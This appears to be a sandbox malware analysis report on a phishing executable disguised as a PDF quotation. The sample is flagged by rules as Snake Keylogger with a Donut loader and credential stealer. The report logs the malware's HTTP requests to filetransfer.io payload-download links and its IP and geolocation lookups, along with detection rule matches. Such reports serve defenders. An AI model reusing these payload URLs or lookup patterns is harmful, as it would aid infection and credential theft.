Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49811 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /data-package/u7ghXEYp/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /storage/download/72vwG3nYeuAb HTTP/1.1Host: s24.filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /data-package/u7ghXEYp/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: filetransfer.io
Source: global traffic	DNS traffic detected: DNS query: s24.filetransfer.io
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB32000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB70000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB5D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FA92000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FA92000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB49000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59F981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: aspnet_compiler.exe, 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: aspnet_compiler.exe, 00000004.00000002.3322566875.000001F5B82E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros1
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EBA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filetransfer.io
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EBA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filetransfer.io/data-package/u7ghXEYp/download
Source: aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB32000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FAB2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB70000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB5D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EBA1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59F981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EBE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filetransfer.io
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EC4F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EBE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filetransfer.io/data-package/u7ghXEYp/download
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB32000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FAE0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB70000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB5D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FA92000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: aspnet_compiler.exe, 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FA92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
Source: aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FA92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75p
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EC14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s24.filetransfer.io
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EBFA000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EC10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s24.filetransfer.io/storage/download/72vwG3nYeuAb
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195ECF0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.1f59e080000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.aspnet_compiler.exe.1f59e080000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.aspnet_compiler.exe.1f59e080000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.1f59e080000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2638636004.000001195F083000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000004.00000002.3318682835.000001F59DD20000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 6176, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 6176, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FF848F452FA	0_2_00007FF848F452FA
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FF849166912	0_2_00007FF849166912
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FF849165B66	0_2_00007FF849165B66
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FF849147B40	0_2_00007FF849147B40
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FF84915539D	0_2_00007FF84915539D
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FF8491403D3	0_2_00007FF8491403D3
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FF849141DE1	0_2_00007FF849141DE1
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FF849148029	0_2_00007FF849148029
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FF849145041	0_2_00007FF849145041
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_000001F59DD42D9C	4_2_000001F59DD42D9C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_000001F59DD43178	4_2_000001F59DD43178
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_000001F59DD435A8	4_2_000001F59DD435A8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_000001F59DD46854	4_2_000001F59DD46854
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_000001F59DD41EC0	4_2_000001F59DD41EC0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_000001F59DD4405C	4_2_000001F59DD4405C

Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Static PE information: No import functions for PE file found

Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EF9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000000.2061985330.000001195CD15000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameJuolsuoza.exeH vs QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638577443.000001195EB30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EBB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EC01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2653112137.00000119774A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameHkybbdm.dll" vs QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Binary or memory string: OriginalFilenameJuolsuoza.exeH vs QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 4.2.aspnet_compiler.exe.1f59e080000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.aspnet_compiler.exe.1f59e080000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.aspnet_compiler.exe.1f59e080000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.aspnet_compiler.exe.1f59e080000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
